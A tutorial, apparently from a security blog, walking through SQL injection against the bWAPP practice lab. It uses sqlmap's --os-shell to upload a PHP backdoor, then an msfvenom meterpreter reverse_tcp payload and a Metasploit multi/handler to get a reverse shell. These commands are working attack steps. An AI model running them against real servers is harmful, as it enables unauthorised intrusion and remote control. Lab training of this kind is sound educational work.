Shell uploading through sql Injection using Sqmap in bWAPP

Multiple times you people have used sqlmap for sql injection to get database of web server. Here in this tutorial I will show you how to upload any backdoor if the website is suffering from sql vulnerability.

Xampp/Wamp Server

Kali Linux: Burp suite, sqlmap tool

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here
Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any movie name like thor in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click on search. Burp suit will provide cookie and referer under fetched data which will later use in sqlmap commands.

Now Type following command to run sqlmap to access os-shell of web server.

sqlmap -u "" --cookie=" PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D bwapp --os-shell

Above command will try to generate a backdoor; I want to send PHP backdoor in target pc therefore type 4 for PHP payload and then Type 1 for common location to use as writable directory to upload it.

At present it is trying to upload the file on “C: /xampp/htdocs/” by using different sql injection techniques. As soon as file is uploaded; it will send INFO the file stager has been successfully uploaded on “C: /xampp/htdocs/”and you will get os-shell of victim pc. But here it also showing the path where you can manually upload your backdoor, look at over highlighted URL:

I am more interested in meterpreter shell so let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost= lport=4444 -f raw. Copy the code from 

Now load metasploit framework by typing msfconsole and start multi/handler

Explore the URL: on browser. From screenshot you can read the heading of web page sqlmap file uploader which will let you to browse you backdoor on web server and will later upload that backdoor to following directory (“C: /xampp/htdocs/” )of web server.

Click on browse to select your shell.php file and then click on upload.

GREAT!!!  Our backdoor shell.php File uploaded.

To execute backdoor on target pc run URL: on browser and you will receive reverse connection to multi/handler.

msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit

Lovely!!! I have my meterpreter session on my kali Linux.


Post a Comment